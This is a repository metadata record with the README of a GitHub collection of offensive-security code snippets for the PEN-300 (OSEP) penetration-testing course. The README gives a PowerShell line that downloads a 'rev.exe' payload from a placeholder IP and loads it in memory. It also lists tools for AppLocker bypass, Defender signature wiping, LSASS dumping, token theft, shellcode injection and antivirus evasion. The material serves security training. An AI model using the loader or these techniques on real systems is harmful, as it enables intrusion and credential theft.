{"id":13840965,"url":"https://github.com/chvancooten/OSEP-Code-Snippets","last_synced_at":"2025-07-11T09:34:10.378Z","repository":{"id":37449636,"uuid":"346498362","full_name":"chvancooten/OSEP-Code-Snippets","owner":"chvancooten","description":"A repository with my notable code snippets for Offensive Security's PEN-300 (OSEP) course.","archived":false,"fork":false,"pushed_at":"2024-01-04T15:17:17.000Z","size":1652,"stargazers_count":1158,"open_issues_count":1,"forks_count":419,"subscribers_count":19,"default_branch":"main","last_synced_at":"2024-11-12T10:02:27.914Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/chvancooten.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":["chvancooten"]}},"created_at":"2021-03-10T21:34:41.000Z","updated_at":"2024-11-10T21:49:54.000Z","dependencies_parsed_at":"2024-01-04T16:42:09.495Z","dependency_job_id":null,"html_url":"https://github.com/chvancooten/OSEP-Code-Snippets","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/chvancooten%2FOSEP-Code-Snippets","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/chvancooten%2FOSEP-Code-Snippets/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/chvancooten%2FOSEP-Code-Snippets/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/chvancooten%2FOSEP-Code-Snippets/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/chvancooten","download_url":"https://codeload.github.com/chvancooten/OSEP-Code-Snippets/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225712900,"owners_count":17512512,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:01:00.408Z","updated_at":"2024-11-21T10:31:03.428Z","avatar_url":"https://github.com/chvancooten.png","language":"C#","funding_links":["https://github.com/sponsors/chvancooten"],"categories":["C# #"],"sub_categories":[],"readme":"# OSEP Code Snippets\nCode examples are provided as-is, without any form of warranty. Based on Offensive Security's [PEN-300](https://www.offensive-security.com/pen300-osep/) course.\n\nClasses and methods are public, so most binaries should allow for reflective loading as below.\n\n```powershell\n$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/rev.exe')\n$assem = [System.Reflection.Assembly]::Load($data)\n[rev.Program]::Main(\"\".Split())\n```\n\n### Contents\n|Snippet Name|Description|\n|--|--|\n| AppLocker Bypass PowerShell Runspace (C#) | Base binary for an applocker bypass using a combination of `CertUtil`, `BitsAdmin`, and `InstallUtil`. See `README.md` for details.|\n| Fileless Lateral Movement (C#) | Wipes Windows Defender signatures on the remote host and uses a PSExec-like method (except using an existing process) to achieve lateral movement. Takes arguments for the target, the target service, and the target binary to run. Note that a non-critical service should be chosen, such as `SensorService`. |\n|Linux Shellcode Encoder (Python) | Utility scripts to encode C# payloads from Linux, either ingesting a raw shellcode payload (.bin), or automatically feeding from 'msfvenom'. Supports XOR and ROT encoding with an arbitrary key, and prints the decoding function. Can be used to replace the C# ROT/XOR encoder scripts.|\n|Linux Shellcode Loaders (C) |Various C-based shellcode loaders, including base binaries for library hijacking.|\n|MiniDump (C# \u0026 PS1) |A simple binary to Dump LSASS to `C:\\Windows\\Tasks\\lsass.dmp`. Also provided as native PowerShell script.|\n|MSSQL (C#)|An example binary that includes a variety of discussed MSSQL interactions. Change the code to include only what you need.|\n|PrintSpoofer.NET (C#)|Steals the token of the incoming authentication forced with the [PrintSpooler exploit](https://github.com/leechristensen/SpoolSample), and use that token to run a given binary. Modified to not require an interactive logon session. Takes arguments for the pipe name and binary to run.|\n|ROT Shellcode Encoder (C#)|A simple binary to apply state-of-the-art ROT encoding to obfuscate the shellcode. It takes an argument for the number of rotations.|\n|Sections Shellcode Process Injector (C#)|Injects and runs shellcode using `NtCreateSection`, `NtMapViewOfSection`, `NtUnMapViewOfsection` and `NtClose` instead of the \"standard\" method.|\n|Shellcode Process Hollowing (C#)|Hollows a `svchost` process and runs the shellcode from there. Scores 0/68 on VirusTotal at the time of writing.|\n|Shellcode Process Injector (C# \u0026 PS1) | Simple shellcode runner that applies process injection. Accepts an argument for the process to inject into. If no argument is given, it attempts to pick a suitable process based on privilege level. Also provided as native PowerShell script (though it is a bit simpler).|\n|Simple Shellcode Runner (C# \u0026 PS1 \u0026 VBA)|The simplest of shellcode runners. Also provided as native PowerShell and VBA scripts.|\n|XOR Shellcode Encoder (C#)|A simple binary to apply state-of-the-art XOR encoding to obfuscate the shellcode.|\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fchvancooten%2FOSEP-Code-Snippets","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fchvancooten%2FOSEP-Code-Snippets","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fchvancooten%2FOSEP-Code-Snippets/lists"}